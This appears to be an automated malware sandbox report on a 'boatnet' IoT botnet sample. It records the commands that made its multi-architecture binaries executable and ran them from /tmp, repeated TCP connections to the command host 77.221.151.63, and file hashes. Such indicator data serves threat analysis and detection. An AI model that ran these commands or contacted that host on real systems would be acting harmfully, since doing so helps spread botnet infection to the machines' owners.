[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
Files
/tmp/boatnet.x86
| MD5 | 895badd48eed0c0e0ba14e8d5967e7bb |
| SHA1 | 3c4c22665e6197841f7e68f941a4a27dca3d4d8d |
| SHA256 | e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4 |
| SHA512 | dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7 |
/tmp/WTF
| MD5 | e3206d28c93769f5acb5e1e1d5b5f219 |
| SHA1 | 198b56e1df06819e1141c1d6e8f7ad7d1646194c |
| SHA256 | cdf3f41e3ad38f3081c882ac25d15d03b9e85b7b7021cbd32a6c504acd353aab |
| SHA512 | dad4a759472131bed86139904962c9ce218dbba129e866fabfb524392e2ef8e77f30087d80305eef0452b5f5e685a5d5103e2ee6518b6b9c103fb55b8cfd3503 |
/tmp/WTF
| MD5 | d94c95baa8be09e30fcdc154241477c8 |
| SHA1 | d0b682898bd94b01afb6ad2f4fb813197f6a0985 |
| SHA256 | 2bcc0d44bafdbdecf7e537c3cf0357ab7f6fa5e7a2820e950e4f33a2ae08c6c6 |
| SHA512 | 7cebf14f7ecfe09c18b161607284a58c771a305b36a4f069493ce813b1cee9bea639412e3fb7d1e492ce889b553ae2512c709b9a3dd2ca86f08b84a07c59e1b9 |
/tmp/WTF
| MD5 | f1c24d9fa40a047ae22d2d3ae7dfeac9 |
| SHA1 | 750274b02d5f5b00026a4f55b020f4285c693533 |
| SHA256 | 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc |
| SHA512 | 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259 |
/tmp/WTF
| MD5 | a8f502a6fb3b7b940e922c951d9e493a |
| SHA1 | fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf |
| SHA256 | 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec |
| SHA512 | e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338 |
/tmp/WTF
| MD5 | fb08806a49f2c5aa8f8ea71c0ca40395 |
| SHA1 | 411ae81e99b9c3ec9d27514a7c18cb5c63189b22 |
| SHA256 | 2f7082951d3b09a10a5308258951b0d2efe7b1717e543e9d51e53e482d00479c |
| SHA512 | 60c4b894a8b169553d63dc8ec09d51ab447dc8644fd382265580368e09bcd6681525c1ebba1a5b44531015b060a7f9ab831d6319e92366243f94e4e2225c74b3 |
memory/839-1-0x00400000-0x00452a58-memory.dmp